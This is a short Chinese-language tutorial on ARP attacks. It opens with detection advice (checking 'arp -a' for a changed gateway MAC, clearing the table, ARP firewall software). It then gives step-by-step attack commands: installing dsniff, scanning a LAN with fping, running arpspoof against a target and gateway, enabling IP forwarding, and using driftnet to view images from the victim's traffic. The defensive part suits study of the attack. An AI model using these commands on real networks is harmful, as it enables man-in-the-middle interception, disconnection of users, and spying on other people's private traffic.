攻击原理请参考https://blog.csdn.net/weixin_43900387/article/details/104207229

arp攻击检测
首先诊断是否为ARP病毒攻击

1、当发现上网明显变慢,或者突然掉线时,我们可以用arp -a命令来检查ARP表:(点击“开始”按钮-选择“运行”-输入“cmd”点击"确定"按钮,在窗口中输入“arp -a”命令)如果发现网关的MAC地址发生了改变,或者发现有很多IP指向同一个物理地址,那么肯定就是ARP欺骗所致。这时可以通过”arp -d“清除arp列表,重新访问。

2、利用ARP防火墙类软件(如:360ARP防火墙、AntiARPSniffer等

有如下现象可能是遭受Arp攻击:  


1、用户掉线、频繁断网、上网慢、业务中断或无法上网。
2、设备CPU占用率较高、设备托管、下挂设备掉线、设备主备状态震荡、设备端口指示灯红色快闪
3、Ping有时延、丢包或不通。

 

 

原理简单来说就是:

        arp欺骗攻击:目标的ip流量会经过我的网卡,从网关出去,

        arp断网攻击:目标的ip流量会经过我的网卡

首先安装aprspoof工具:

apt-get install dsniff ssldump

用法提示: arpspoof -h

 

 扫局域网中的ip :  

1. fping -asg 192.168.163.0/24

 

2. 用法:arpspoof -i -t eth0 被攻击的ip 网关

例如:arpspoof -i eth0 -t 192.168.163.130 192.168.163.2

 

ip流量转发:查看他人图片

echo 1>/proc/sys/net/ipv4/ip_forward

然后再进行断网操作开始欺骗

1.arp欺骗   一系列操作 成功之后

2.driftnet    :获取本机的网卡图片 目标--》我的网卡--》网关    

     看我自己的网卡图片信息 driftnet -i  eth0    即可弹出小框出现图片信息